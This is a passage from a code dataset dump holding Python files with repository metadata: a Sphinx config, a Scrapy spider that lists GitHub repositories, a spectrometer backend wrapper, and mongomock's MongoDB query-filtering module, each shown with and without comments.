project = 'Spinta'
copyright = '2020-2021, Spinta Team'
author = 'Spinta Team'
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.napoleon',
]
templates_path = ['_templates']
language = 'en'
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', '.venv']
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
master_doc = 'index'
autodoc_typehints = 'description'
| true | true |
1c3050b2b610afa08db98f5f49804dd345368fdb | 1,038 | py | Python | Answers/week1-challenge-05/shiyanlou/spiders/github.py | ruoshengyuan/louplus-dm | f1cdcc5b7447536a40c8ffee442437fb269b2c75 | [
"MIT"
] | null | null | null | Answers/week1-challenge-05/shiyanlou/spiders/github.py | ruoshengyuan/louplus-dm | f1cdcc5b7447536a40c8ffee442437fb269b2c75 | [
"MIT"
] | null | null | null | Answers/week1-challenge-05/shiyanlou/spiders/github.py | ruoshengyuan/louplus-dm | f1cdcc5b7447536a40c8ffee442437fb269b2c75 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import scrapy
from shiyanlou.items import ShiyanlouItem
class GithubSpider(scrapy.Spider):
name = 'github'
allowed_domains = ['github.com']
@property
def start_urls(self):
url_temp = 'https://github.com/shiyanlou?after={}&tab=repositories'
# 此参考会失效,请自行重新手动复制 after 参数
after = [
'',
'Y3Vyc29yOnYyOpK5MjAxNy0wNi0wN1QwNjoxOTo1NyswODowMM4FkpYw',
'Y3Vyc29yOnYyOpK5MjAxNS0wMS0yNVQxMTozMTowNyswODowMM4Bxrsx',
'Y3Vyc29yOnYyOpK5MjAxNC0xMS0yMFQxMzowMzo1MiswODowMM4BjkvL',
]
return (url_temp.format(i) for i in after) # 1-4 页
def parse(self, response):
repos = response.xpath('//li[@itemprop="owns"]')
for repo in repos:
item = ShiyanlouItem()
item['repo_name'] = repo.xpath(".//a[@itemprop='name codeRepository']/text()").extract_first().strip()
item['update_time'] = repo.xpath(".//relative-time/@datetime").extract_first()
yield item | 35.793103 | 114 | 0.624277 |
import scrapy
from shiyanlou.items import ShiyanlouItem
class GithubSpider(scrapy.Spider):
name = 'github'
allowed_domains = ['github.com']
@property
def start_urls(self):
url_temp = 'https://github.com/shiyanlou?after={}&tab=repositories'
after = [
'',
'Y3Vyc29yOnYyOpK5MjAxNy0wNi0wN1QwNjoxOTo1NyswODowMM4FkpYw',
'Y3Vyc29yOnYyOpK5MjAxNS0wMS0yNVQxMTozMTowNyswODowMM4Bxrsx',
'Y3Vyc29yOnYyOpK5MjAxNC0xMS0yMFQxMzowMzo1MiswODowMM4BjkvL',
]
return (url_temp.format(i) for i in after)
def parse(self, response):
repos = response.xpath('//li[@itemprop="owns"]')
for repo in repos:
item = ShiyanlouItem()
item['repo_name'] = repo.xpath(".//a[@itemprop='name codeRepository']/text()").extract_first().strip()
item['update_time'] = repo.xpath(".//relative-time/@datetime").extract_first()
yield item | true | true |
1c305105c9b9faa649ccbbdfd85ec89e21d7b263 | 1,537 | py | Python | src/spectrabuster/backends/seatease.py | eduardosprp/spectrabuster | bb75c2bc860fd5ade7414b212e63113e6fa22eab | [
"MIT"
] | null | null | null | src/spectrabuster/backends/seatease.py | eduardosprp/spectrabuster | bb75c2bc860fd5ade7414b212e63113e6fa22eab | [
"MIT"
] | 1 | 2020-11-14T16:04:23.000Z | 2020-11-14T16:04:23.000Z | src/spectrabuster/backends/seatease.py | eduardosprp/spectrabuster | bb75c2bc860fd5ade7414b212e63113e6fa22eab | [
"MIT"
] | 3 | 2020-11-14T03:27:09.000Z | 2022-01-14T09:25:22.000Z | from seatease.spectrometers import Spectrometer, list_devices
from time import sleep
features = {
"measure": True,
"correct_nl": False,
"correct_dc": False,
"temperature": False,
"int_time_limits": True,
"sat_intensity": True,
}
class Device(object):
# {{{
def __init__(self, device_obj=None, **kwargs):
# Yes, I am aware that having a self._device inside the
# Device class can be somewhat confusing
if device_obj is None:
self._device = Spectrometer(list_devices()[0])
else:
self._device = Spectrometer(device_obj)
def measure(self, **kwargs):
correct_nl = kwargs["correct_nl"] if "correct_nl" in kwargs else False
correct_dc = kwargs["correct_dc"] if "correct_dc" in kwargs else False
return self._device.intensities(correct_dc, correct_nl)
def wavelengths(self, **kwargs):
return self._device.wavelengths()
def set_int_time(self, int_time, sleep_time=0, **kwargs):
self._device.integration_time_micros(int_time)
# This is to account for the delay involved in changing
# the spectrometer's integration time
sleep(sleep_time)
@property
def int_time_limits(self):
return self._device.integration_time_micros_limits
@property
def sat_intensity(self):
return self._device.max_intensity
# }}}
def devices():
return list_devices()
def first_available_device():
return Device()
def get_name(self):
return "seatease"
| 25.196721 | 78 | 0.668835 | from seatease.spectrometers import Spectrometer, list_devices
from time import sleep
features = {
"measure": True,
"correct_nl": False,
"correct_dc": False,
"temperature": False,
"int_time_limits": True,
"sat_intensity": True,
}
class Device(object):
def __init__(self, device_obj=None, **kwargs):
if device_obj is None:
self._device = Spectrometer(list_devices()[0])
else:
self._device = Spectrometer(device_obj)
def measure(self, **kwargs):
correct_nl = kwargs["correct_nl"] if "correct_nl" in kwargs else False
correct_dc = kwargs["correct_dc"] if "correct_dc" in kwargs else False
return self._device.intensities(correct_dc, correct_nl)
def wavelengths(self, **kwargs):
return self._device.wavelengths()
def set_int_time(self, int_time, sleep_time=0, **kwargs):
self._device.integration_time_micros(int_time)
sleep(sleep_time)
@property
def int_time_limits(self):
return self._device.integration_time_micros_limits
@property
def sat_intensity(self):
return self._device.max_intensity
# }}}
def devices():
return list_devices()
def first_available_device():
return Device()
def get_name(self):
return "seatease"
| true | true |
1c305148d374f55b3f65306302b42c446774fab6 | 15,548 | py | Python | mongomock/filtering.py | maximeLeurent/mongo_mock | 76900d82f80ee66662460a0029058f39b096bf88 | [
"BSD-3-Clause"
] | null | null | null | mongomock/filtering.py | maximeLeurent/mongo_mock | 76900d82f80ee66662460a0029058f39b096bf88 | [
"BSD-3-Clause"
] | null | null | null | mongomock/filtering.py | maximeLeurent/mongo_mock | 76900d82f80ee66662460a0029058f39b096bf88 | [
"BSD-3-Clause"
] | null | null | null | from datetime import datetime
import itertools
from .helpers import ObjectId, RE_TYPE
from . import OperationFailure
import numbers
import operator
import re
from sentinels import NOTHING
from six import iteritems, iterkeys, string_types
try:
from types import NoneType
except ImportError:
NoneType = type(None)
COMPILED_RE_TYPE = type(re.compile('a'))
_TOP_LEVEL_OPERATORS = {'$expr', '$text', '$where', '$jsonSchema'}
def filter_applies(search_filter, document):
    """Return True if *document* matches the MongoDB query *search_filter*.

    Implements MongoDB's matching strategy over documents as used by the
    find() method and related scenarios (like $elemMatch).
    """
    filterer = _Filterer()
    return filterer.apply(search_filter, document)
class _Filterer(object):
    """An object to help applying a filter, using the MongoDB query language."""

    def __init__(self):
        # Maps a query operator (e.g. '$eq') to a callable taking
        # (document_value, search_value) and returning a truthy/falsy result.
        # The comparison operators from SORTING_OPERATOR_MAP are wrapped so
        # they skip missing values and expand element-wise over array fields.
        self._operator_map = dict({
            '$eq': _list_expand(operator_eq),
            '$ne': _list_expand(lambda dv, sv: not operator_eq(dv, sv), negative=True),
            '$all': self._all_op,
            '$in': _in_op,
            '$nin': lambda dv, sv: not _in_op(dv, sv),
            '$exists': lambda dv, sv: bool(sv) == (dv is not NOTHING),
            '$regex': _not_nothing_and(lambda dv, sv: _regex(dv, re.compile(sv))),
            '$elemMatch': self._elem_match_op,
            '$size': _size_op,
            '$type': _type_op
        }, **{
            key: _not_nothing_and(_list_expand(_compare_objects(op)))
            for key, op in iteritems(SORTING_OPERATOR_MAP)
        })

    def apply(self, search_filter, document):
        """Return True if *document* matches *search_filter*.

        Raises OperationFailure for malformed filters and NotImplementedError
        for recognized-but-unsupported top-level operators.
        """
        if not isinstance(search_filter, dict):
            raise OperationFailure('the match filter must be an expression in an object')

        for key, search in iteritems(search_filter):
            # Top level operators.
            if key == '$comment':
                continue
            if key in LOGICAL_OPERATOR_MAP:
                if not search:
                    raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
                if not LOGICAL_OPERATOR_MAP[key](document, search, self.apply):
                    return False
                continue
            if key in _TOP_LEVEL_OPERATORS:
                raise NotImplementedError(
                    'The {} operator is not implemented in mongomock yet'.format(key))
            if key.startswith('$'):
                raise OperationFailure('unknown top level operator: ' + key)

            is_match = False
            # Negative operators ($ne/$nin) must hold for *every* candidate
            # value of the key, while positive operators only need one
            # matching candidate.
            is_checking_negative_match = \
                isinstance(search, dict) and {'$ne', '$nin'} & set(search.keys())
            is_checking_positive_match = \
                not isinstance(search, dict) or (set(search.keys()) - {'$ne', '$nin'})
            has_candidates = False

            # {'$exists': False} on a key with no candidate values is trivially true.
            if search == {'$exists': False} and not iter_key_candidates(key, document):
                continue

            # $all is evaluated against the full candidate list at once, not
            # per candidate value like the other operators below.
            if isinstance(search, dict) and '$all' in search:
                if not self._all_op(iter_key_candidates(key, document), search['$all']):
                    return False
                continue

            for doc_val in iter_key_candidates(key, document):
                has_candidates |= doc_val is not NOTHING
                # A non-empty dict whose keys all start with '$' is an
                # operator filter (e.g. {'$gt': 3, '$lt': 10}); any other
                # search value is matched literally.
                is_ops_filter = search and isinstance(search, dict) and \
                    all(key.startswith('$') for key in search.keys())
                if is_ops_filter:
                    if '$options' in search and '$regex' in search:
                        search = _combine_regex_options(search)
                    unknown_operators = set(search) - set(self._operator_map) - {'$not'}
                    if unknown_operators:
                        raise OperationFailure('unknown operator: ' + list(unknown_operators)[0])
                    is_match = all(
                        operator_string in self._operator_map and
                        self._operator_map[operator_string](doc_val, search_val) or
                        operator_string == '$not' and
                        self._not_op(document, key, search_val)
                        for operator_string, search_val in iteritems(search)
                    ) and search
                elif isinstance(search, RE_TYPE) and isinstance(doc_val, (string_types, list)):
                    is_match = _regex(doc_val, search)
                elif key in LOGICAL_OPERATOR_MAP:
                    if not search:
                        raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
                    is_match = LOGICAL_OPERATOR_MAP[key](document, search, self.apply)
                elif isinstance(doc_val, (list, tuple)):
                    # A literal value matches an array field if it equals the
                    # array itself or any of its elements; ObjectIds also
                    # match their string representation inside the array.
                    is_match = (search in doc_val or search == doc_val)
                    if isinstance(search, ObjectId):
                        is_match |= (str(search) in doc_val)
                else:
                    is_match = (doc_val == search) or (search is None and doc_val is NOTHING)

                # When checking negative match, all the elements should match.
                if is_checking_negative_match and not is_match:
                    return False

                # If not checking negative matches, the first match is enough for this criteria.
                if is_match and not is_checking_negative_match:
                    break

            if not is_match and (has_candidates or is_checking_positive_match):
                return False

        return True

    def _not_op(self, d, k, s):
        """Implement $not: succeed when the wrapped filter does *not* match."""
        if isinstance(s, dict):
            # Validate the operator names before negating the match.
            for key in s.keys():
                if key not in self._operator_map and key not in LOGICAL_OPERATOR_MAP:
                    raise OperationFailure('unknown operator: %s' % key)
        elif isinstance(s, type(re.compile(''))):
            pass
        else:
            raise OperationFailure('$not needs a regex or a document')
        return not self.apply({k: s}, d)

    def _elem_match_op(self, doc_val, query):
        """Implement $elemMatch: some array element matches the whole *query*."""
        if not isinstance(doc_val, list):
            return False
        if not isinstance(query, dict):
            raise OperationFailure('$elemMatch needs an Object')
        return any(self.apply(query, item) for item in doc_val)

    def _all_op(self, doc_val, search_val):
        """Implement $all: every element of *search_val* must be matched."""
        # A list of lists is flattened one level before matching.
        if isinstance(doc_val, list) and doc_val and isinstance(doc_val[0], list):
            doc_val = list(itertools.chain.from_iterable(doc_val))
        dv = _force_list(doc_val)
        matches = []
        for x in search_val:
            if isinstance(x, dict) and '$elemMatch' in x:
                matches.append(self._elem_match_op(doc_val, x['$elemMatch']))
            else:
                matches.append(x in dv)
        return all(matches)
def iter_key_candidates(key, doc):
    """Get possible subdocuments or lists that are referred to by the key in question.

    Returns the appropriate nested value if the key includes dot notation.
    """
    if doc is None:
        return ()
    if not key:
        return [doc]
    if isinstance(doc, list):
        return _iter_key_candidates_sublist(key, doc)
    if not isinstance(doc, dict):
        return ()

    # Split off the first dotted segment; recurse into the subdocument when
    # there is a remainder, otherwise look the key up directly.
    head, sep, rest = key.partition('.')
    if not sep:
        return [doc.get(key, NOTHING)]
    return iter_key_candidates(rest, doc.get(head, {}))
def _iter_key_candidates_sublist(key, doc):
"""Iterates of candidates
:param doc: a list to be searched for candidates for our key
:param key: the string key to be matched
"""
key_parts = key.split('.')
sub_key = key_parts.pop(0)
key_remainder = '.'.join(key_parts)
try:
sub_key_int = int(sub_key)
except ValueError:
sub_key_int = None
if sub_key_int is None:
# subkey is not an integer...
return [x
for sub_doc in doc
if isinstance(sub_doc, dict) and sub_key in sub_doc
for x in iter_key_candidates(key_remainder, sub_doc[sub_key])]
# subkey is an index
if sub_key_int >= len(doc):
return () # dead end
sub_doc = doc[sub_key_int]
if key_parts:
return iter_key_candidates('.'.join(key_parts), sub_doc)
return [sub_doc]
def _force_list(v):
return v if isinstance(v, (list, tuple)) else [v]
def _in_op(doc_val, search_val):
    """Implement $in: match when any candidate value appears in *search_val*."""
    if not isinstance(search_val, (list, tuple)):
        raise OperationFailure('$in needs an array')
    # A missing field matches $in when the searched array contains None.
    if doc_val is NOTHING and None in search_val:
        return True
    values = _force_list(doc_val)
    regex_flags = [isinstance(entry, COMPILED_RE_TYPE) for entry in search_val]
    if not any(regex_flags):
        # Fast path: no compiled patterns, plain membership test only.
        return any(value in search_val for value in values)
    # Mixed array: compiled patterns are matched against the values, while
    # other entries are compared by membership.
    for entry, is_regex in zip(search_val, regex_flags):
        if is_regex and _regex(values, entry):
            return True
        if entry in values:
            return True
    return False
def _not_nothing_and(f):
    """Wrap an operator so it returns False when the first argument is NOTHING."""
    def _guarded(doc_val, search_val):
        return doc_val is not NOTHING and f(doc_val, search_val)
    return _guarded
def _compare_objects(op):
    """Wrap an operator to also compare objects following BSON comparison.

    See https://docs.mongodb.com/manual/reference/bson-type-comparison-order/#objects
    """
    def _bracketed(a, b):
        # Type Bracketing: values of different BSON types never compare, see
        # https://docs.mongodb.com/manual/reference/method/db.collection.find/#type-bracketing
        return bson_compare(op, a, b, can_compare_types=False)
    return _bracketed
def bson_compare(op, a, b, can_compare_types=True):
    """Compare two elements using BSON comparison.

    Args:
        op: the basic operation to compare (e.g. operator.lt, operator.ge).
        a: the first operand
        b: the second operand
        can_compare_types: if True, according to BSON's definition order
            between types is used, otherwise always return False when types are
            different.
    """
    a_type = _get_compare_type(a)
    b_type = _get_compare_type(b)
    if a_type != b_type:
        # Different BSON types: either compare by the canonical type order,
        # or refuse entirely (Type Bracketing) when can_compare_types is False.
        return can_compare_types and op(a_type, b_type)

    if isinstance(a, dict):
        # MongoDb server compares the type before comparing the keys
        # https://github.com/mongodb/mongo/blob/f10f214/src/mongo/bson/bsonelement.cpp#L516
        # even though the documentation does not say anything about that.
        a = [(_get_compare_type(v), k, v) for k, v in iteritems(a)]
        b = [(_get_compare_type(v), k, v) for k, v in iteritems(b)]

    if isinstance(a, (tuple, list)):
        # Lexicographic comparison: decide on the first differing element,
        # falling back to comparing lengths when one sequence is a prefix
        # of the other.
        for item_a, item_b in zip(a, b):
            if item_a != item_b:
                return bson_compare(op, item_a, item_b)
        return bson_compare(op, len(a), len(b))

    if isinstance(a, NoneType):
        # Both operands are None here; compare as equal values.
        return op(0, 0)

    return op(a, b)
def _get_compare_type(val):
    """Get a number representing the base type of the value used for comparison.

    See https://docs.mongodb.com/manual/reference/bson-type-comparison-order/
    also https://github.com/mongodb/mongo/blob/46b28bb/src/mongo/bson/bsontypes.h#L175
    for canonical values.
    """
    # Order matters: bool is a numbers.Number subclass, so it must be
    # matched before the generic number case.
    ranked_types = (
        (NoneType, 5),
        (bool, 40),
        (numbers.Number, 10),
        (string_types, 15),
        (dict, 20),
        ((tuple, list), 25),
        (ObjectId, 35),
        (datetime, 45),
        (RE_TYPE, 50),
    )
    for candidate, rank in ranked_types:
        if isinstance(val, candidate):
            return rank
    raise NotImplementedError(
        "Mongomock does not know how to sort '%s' of type '%s'" %
        (val, type(val)))
def _regex(doc_val, regex):
    """Return True when *regex* matches any string inside *doc_val*."""
    if not isinstance(doc_val, (string_types, list, RE_TYPE)):
        return False
    for candidate in _force_list(doc_val):
        # Non-string array members (numbers, sub-documents, ...) never match.
        if isinstance(candidate, string_types) and regex.search(candidate):
            return True
    return False
def _size_op(doc_val, search_val):
if isinstance(doc_val, (list, tuple, dict)):
return search_val == len(doc_val)
return search_val == 1 if doc_val else 0
def _list_expand(f, negative=False):
def func(doc_val, search_val):
if isinstance(doc_val, (list, tuple)):
if negative:
return all(f(val, search_val) for val in doc_val)
return any(f(val, search_val) for val in doc_val)
return f(doc_val, search_val)
return func
def _type_op(doc_val, search_val):
    """Implement $type: check *doc_val* against the BSON type alias *search_val*."""
    try:
        accepted_types = TYPE_MAP[search_val]
    except KeyError:
        raise OperationFailure('%r is not a valid $type' % search_val)
    if accepted_types is None:
        # Alias is valid in MongoDB but has no mongomock implementation.
        raise NotImplementedError('%s is a valid $type but not implemented' % search_val)
    return isinstance(doc_val, accepted_types)
def _combine_regex_options(search):
    """Merge a '$options' string into the '$regex' value of *search*.

    Returns a copy of *search* without the '$options' key, where '$regex'
    has been compiled with the requested `re` flags.
    """
    if not isinstance(search['$options'], string_types):
        raise OperationFailure('$options has to be a string')
    options = None
    # Accumulate the re flags; option letters outside 'imxs' are silently ignored.
    for option in search['$options']:
        if option not in 'imxs':
            continue
        re_option = getattr(re, option.upper())
        if options is None:
            options = re_option
        else:
            options |= re_option
    search_copy = dict(search)
    del search_copy['$options']
    if options is None:
        return search_copy
    if isinstance(search['$regex'], COMPILED_RE_TYPE):
        # A pre-compiled pattern with '$options' listed first mirrors a server
        # bug (SERVER-38621); that key ordering is deliberately unsupported.
        keys = [k for k in iterkeys(search) if k in {'$regex', '$options'}]
        if keys == ['$options', '$regex']:
            raise NotImplementedError(
                'Do not use compiled regular expressions with $options until '
                'https://jira.mongodb.org/browse/SERVER-38621 is solved.')
        search_copy['$regex'] = re.compile(
            search['$regex'].pattern, search['$regex'].flags | options)
    else:
        search_copy['$regex'] = re.compile(search['$regex'], options)
    return search_copy
def operator_eq(doc_val, search_val):
    """Equality check where a missing field (NOTHING) compares equal to None."""
    missing_matches_none = doc_val is NOTHING and search_val is None
    return missing_matches_none or operator.eq(doc_val, search_val)
# Range comparison operators mapped to their Python equivalents; they are
# wrapped with BSON semantics via _compare_objects when the filterer is built.
SORTING_OPERATOR_MAP = {
    '$gt': operator.gt,
    '$gte': operator.ge,
    '$lt': operator.lt,
    '$lte': operator.le,
}

# Logical operators receive the whole document, the list of sub-queries and
# the filter callback so they can recurse into document filtering.
LOGICAL_OPERATOR_MAP = {
    '$or': lambda d, subq, filter_func: any(filter_func(q, d) for q in subq),
    '$and': lambda d, subq, filter_func: all(filter_func(q, d) for q in subq),
    '$nor': lambda d, subq, filter_func: all(not filter_func(q, d) for q in subq),
}

# BSON type aliases accepted by $type, mapped to the Python types used in the
# isinstance() check.  None marks an alias that is valid in MongoDB but not
# implemented here ($type raises NotImplementedError for it).
TYPE_MAP = {
    'double': (float,),
    'string': (str,),
    'object': (dict,),
    'array': (list,),
    'binData': (bytes,),
    'undefined': None,
    'objectId': (ObjectId,),
    'bool': (bool,),
    'date': (datetime,),
    'null': None,
    'regex': None,
    'dbPointer': None,
    'javascript': None,
    'symbol': None,
    'javascriptWithScope': None,
    'int': (int,),
    'timestamp': None,
    # NOTE(review): 'long' and 'decimal' are approximated with float -- they
    # have no distinct Python counterpart in this implementation.
    'long': (float,),
    'decimal': (float,),
    'minKey': None,
    'maxKey': None,
}
def resolve_key(key, doc):
    """Return the first candidate value for dotted *key* in *doc*, or NOTHING."""
    for candidate in iter_key_candidates(key, doc):
        return candidate
    return NOTHING
def resolve_sort_key(key, doc):
    """Build a (presence, wrapped value) sort key for *doc*.

    Missing values sort before any present value, see
    http://docs.mongodb.org/manual/reference/method/cursor.sort/#ascending-descending-sort
    """
    value = resolve_key(key, doc)
    is_missing = value is NOTHING
    return (0, BsonComparable(None)) if is_missing else (1, BsonComparable(value))
class BsonComparable(object):
    """Wraps a value in an BSON like object that can be compared one to another."""

    def __init__(self, obj):
        # The wrapped raw value; ordering is delegated to bson_compare.
        self.obj = obj

    def __lt__(self, other):
        # Only __lt__ is defined: sorted()/list.sort() rely solely on "<".
        return bson_compare(operator.lt, self.obj, other.obj)
| 34.551111 | 97 | 0.61159 | from datetime import datetime
import itertools
from .helpers import ObjectId, RE_TYPE
from . import OperationFailure
import numbers
import operator
import re
from sentinels import NOTHING
from six import iteritems, iterkeys, string_types
try:
from types import NoneType
except ImportError:
NoneType = type(None)
COMPILED_RE_TYPE = type(re.compile('a'))
_TOP_LEVEL_OPERATORS = {'$expr', '$text', '$where', '$jsonSchema'}
def filter_applies(search_filter, document):
return _Filterer().apply(search_filter, document)
class _Filterer(object):
def __init__(self):
self._operator_map = dict({
'$eq': _list_expand(operator_eq),
'$ne': _list_expand(lambda dv, sv: not operator_eq(dv, sv), negative=True),
'$all': self._all_op,
'$in': _in_op,
'$nin': lambda dv, sv: not _in_op(dv, sv),
'$exists': lambda dv, sv: bool(sv) == (dv is not NOTHING),
'$regex': _not_nothing_and(lambda dv, sv: _regex(dv, re.compile(sv))),
'$elemMatch': self._elem_match_op,
'$size': _size_op,
'$type': _type_op
}, **{
key: _not_nothing_and(_list_expand(_compare_objects(op)))
for key, op in iteritems(SORTING_OPERATOR_MAP)
})
def apply(self, search_filter, document):
if not isinstance(search_filter, dict):
raise OperationFailure('the match filter must be an expression in an object')
for key, search in iteritems(search_filter):
if key == '$comment':
continue
if key in LOGICAL_OPERATOR_MAP:
if not search:
raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
if not LOGICAL_OPERATOR_MAP[key](document, search, self.apply):
return False
continue
if key in _TOP_LEVEL_OPERATORS:
raise NotImplementedError(
'The {} operator is not implemented in mongomock yet'.format(key))
if key.startswith('$'):
raise OperationFailure('unknown top level operator: ' + key)
is_match = False
is_checking_negative_match = \
isinstance(search, dict) and {'$ne', '$nin'} & set(search.keys())
is_checking_positive_match = \
not isinstance(search, dict) or (set(search.keys()) - {'$ne', '$nin'})
has_candidates = False
if search == {'$exists': False} and not iter_key_candidates(key, document):
continue
if isinstance(search, dict) and '$all' in search:
if not self._all_op(iter_key_candidates(key, document), search['$all']):
return False
continue
for doc_val in iter_key_candidates(key, document):
has_candidates |= doc_val is not NOTHING
is_ops_filter = search and isinstance(search, dict) and \
all(key.startswith('$') for key in search.keys())
if is_ops_filter:
if '$options' in search and '$regex' in search:
search = _combine_regex_options(search)
unknown_operators = set(search) - set(self._operator_map) - {'$not'}
if unknown_operators:
raise OperationFailure('unknown operator: ' + list(unknown_operators)[0])
is_match = all(
operator_string in self._operator_map and
self._operator_map[operator_string](doc_val, search_val) or
operator_string == '$not' and
self._not_op(document, key, search_val)
for operator_string, search_val in iteritems(search)
) and search
elif isinstance(search, RE_TYPE) and isinstance(doc_val, (string_types, list)):
is_match = _regex(doc_val, search)
elif key in LOGICAL_OPERATOR_MAP:
if not search:
raise OperationFailure('BadValue $and/$or/$nor must be a nonempty array')
is_match = LOGICAL_OPERATOR_MAP[key](document, search, self.apply)
elif isinstance(doc_val, (list, tuple)):
is_match = (search in doc_val or search == doc_val)
if isinstance(search, ObjectId):
is_match |= (str(search) in doc_val)
else:
is_match = (doc_val == search) or (search is None and doc_val is NOTHING)
if is_checking_negative_match and not is_match:
return False
if is_match and not is_checking_negative_match:
break
if not is_match and (has_candidates or is_checking_positive_match):
return False
return True
def _not_op(self, d, k, s):
if isinstance(s, dict):
for key in s.keys():
if key not in self._operator_map and key not in LOGICAL_OPERATOR_MAP:
raise OperationFailure('unknown operator: %s' % key)
elif isinstance(s, type(re.compile(''))):
pass
else:
raise OperationFailure('$not needs a regex or a document')
return not self.apply({k: s}, d)
def _elem_match_op(self, doc_val, query):
if not isinstance(doc_val, list):
return False
if not isinstance(query, dict):
raise OperationFailure('$elemMatch needs an Object')
return any(self.apply(query, item) for item in doc_val)
def _all_op(self, doc_val, search_val):
if isinstance(doc_val, list) and doc_val and isinstance(doc_val[0], list):
doc_val = list(itertools.chain.from_iterable(doc_val))
dv = _force_list(doc_val)
matches = []
for x in search_val:
if isinstance(x, dict) and '$elemMatch' in x:
matches.append(self._elem_match_op(doc_val, x['$elemMatch']))
else:
matches.append(x in dv)
return all(matches)
def iter_key_candidates(key, doc):
if doc is None:
return ()
if not key:
return [doc]
if isinstance(doc, list):
return _iter_key_candidates_sublist(key, doc)
if not isinstance(doc, dict):
return ()
key_parts = key.split('.')
if len(key_parts) == 1:
return [doc.get(key, NOTHING)]
sub_key = '.'.join(key_parts[1:])
sub_doc = doc.get(key_parts[0], {})
return iter_key_candidates(sub_key, sub_doc)
def _iter_key_candidates_sublist(key, doc):
key_parts = key.split('.')
sub_key = key_parts.pop(0)
key_remainder = '.'.join(key_parts)
try:
sub_key_int = int(sub_key)
except ValueError:
sub_key_int = None
if sub_key_int is None:
return [x
for sub_doc in doc
if isinstance(sub_doc, dict) and sub_key in sub_doc
for x in iter_key_candidates(key_remainder, sub_doc[sub_key])]
if sub_key_int >= len(doc):
return ()
sub_doc = doc[sub_key_int]
if key_parts:
return iter_key_candidates('.'.join(key_parts), sub_doc)
return [sub_doc]
def _force_list(v):
return v if isinstance(v, (list, tuple)) else [v]
def _in_op(doc_val, search_val):
if not isinstance(search_val, (list, tuple)):
raise OperationFailure('$in needs an array')
if doc_val is NOTHING and None in search_val:
return True
doc_val = _force_list(doc_val)
is_regex_list = [isinstance(x, COMPILED_RE_TYPE) for x in search_val]
if not any(is_regex_list):
return any(x in search_val for x in doc_val)
for x, is_regex in zip(search_val, is_regex_list):
if (is_regex and _regex(doc_val, x)) or (x in doc_val):
return True
return False
def _not_nothing_and(f):
return lambda v, l: v is not NOTHING and f(v, l)
def _compare_objects(op):
    """Wrap an operator to also compare objects following BSON comparison.

    can_compare_types=False enforces MongoDB type bracketing: values of
    different BSON types are never ordered relative to each other.
    """
    def _wrapped(a, b):
        # BUG FIX: the comparison result must be returned; previously the
        # wrapper fell through and always returned None (falsy), so every
        # wrapped range operator ($gt/$lt/...) evaluated to "no match".
        return bson_compare(op, a, b, can_compare_types=False)
    return _wrapped
def bson_compare(op, a, b, can_compare_types=True):
a_type = _get_compare_type(a)
b_type = _get_compare_type(b)
if a_type != b_type:
return can_compare_types and op(a_type, b_type)
if isinstance(a, dict):
a = [(_get_compare_type(v), k, v) for k, v in iteritems(a)]
b = [(_get_compare_type(v), k, v) for k, v in iteritems(b)]
if isinstance(a, (tuple, list)):
for item_a, item_b in zip(a, b):
if item_a != item_b:
return bson_compare(op, item_a, item_b)
return bson_compare(op, len(a), len(b))
if isinstance(a, NoneType):
return op(0, 0)
return op(a, b)
def _get_compare_type(val):
if isinstance(val, NoneType):
return 5
if isinstance(val, bool):
return 40
if isinstance(val, numbers.Number):
return 10
if isinstance(val, string_types):
return 15
if isinstance(val, dict):
return 20
if isinstance(val, (tuple, list)):
return 25
if isinstance(val, ObjectId):
return 35
if isinstance(val, datetime):
return 45
if isinstance(val, RE_TYPE):
return 50
raise NotImplementedError(
"Mongomock does not know how to sort '%s' of type '%s'" %
(val, type(val)))
def _regex(doc_val, regex):
if not (isinstance(doc_val, (string_types, list)) or isinstance(doc_val, RE_TYPE)):
return False
return any(
regex.search(item) for item in _force_list(doc_val)
if isinstance(item, string_types))
def _size_op(doc_val, search_val):
if isinstance(doc_val, (list, tuple, dict)):
return search_val == len(doc_val)
return search_val == 1 if doc_val else 0
def _list_expand(f, negative=False):
def func(doc_val, search_val):
if isinstance(doc_val, (list, tuple)):
if negative:
return all(f(val, search_val) for val in doc_val)
return any(f(val, search_val) for val in doc_val)
return f(doc_val, search_val)
return func
def _type_op(doc_val, search_val):
if search_val not in TYPE_MAP:
raise OperationFailure('%r is not a valid $type' % search_val)
elif TYPE_MAP[search_val] is None:
raise NotImplementedError('%s is a valid $type but not implemented' % search_val)
return isinstance(doc_val, TYPE_MAP[search_val])
def _combine_regex_options(search):
if not isinstance(search['$options'], string_types):
raise OperationFailure('$options has to be a string')
options = None
for option in search['$options']:
if option not in 'imxs':
continue
re_option = getattr(re, option.upper())
if options is None:
options = re_option
else:
options |= re_option
search_copy = dict(search)
del search_copy['$options']
if options is None:
return search_copy
if isinstance(search['$regex'], COMPILED_RE_TYPE):
keys = [k for k in iterkeys(search) if k in {'$regex', '$options'}]
if keys == ['$options', '$regex']:
raise NotImplementedError(
'Do not use compiled regular expressions with $options until '
'https://jira.mongodb.org/browse/SERVER-38621 is solved.')
search_copy['$regex'] = re.compile(
search['$regex'].pattern, search['$regex'].flags | options)
else:
search_copy['$regex'] = re.compile(search['$regex'], options)
return search_copy
def operator_eq(doc_val, search_val):
if doc_val is NOTHING and search_val is None:
return True
return operator.eq(doc_val, search_val)
SORTING_OPERATOR_MAP = {
'$gt': operator.gt,
'$gte': operator.ge,
'$lt': operator.lt,
'$lte': operator.le,
}
LOGICAL_OPERATOR_MAP = {
'$or': lambda d, subq, filter_func: any(filter_func(q, d) for q in subq),
'$and': lambda d, subq, filter_func: all(filter_func(q, d) for q in subq),
'$nor': lambda d, subq, filter_func: all(not filter_func(q, d) for q in subq),
}
TYPE_MAP = {
'double': (float,),
'string': (str,),
'object': (dict,),
'array': (list,),
'binData': (bytes,),
'undefined': None,
'objectId': (ObjectId,),
'bool': (bool,),
'date': (datetime,),
'null': None,
'regex': None,
'dbPointer': None,
'javascript': None,
'symbol': None,
'javascriptWithScope': None,
'int': (int,),
'timestamp': None,
'long': (float,),
'decimal': (float,),
'minKey': None,
'maxKey': None,
}
def resolve_key(key, doc):
return next(iter(iter_key_candidates(key, doc)), NOTHING)
def resolve_sort_key(key, doc):
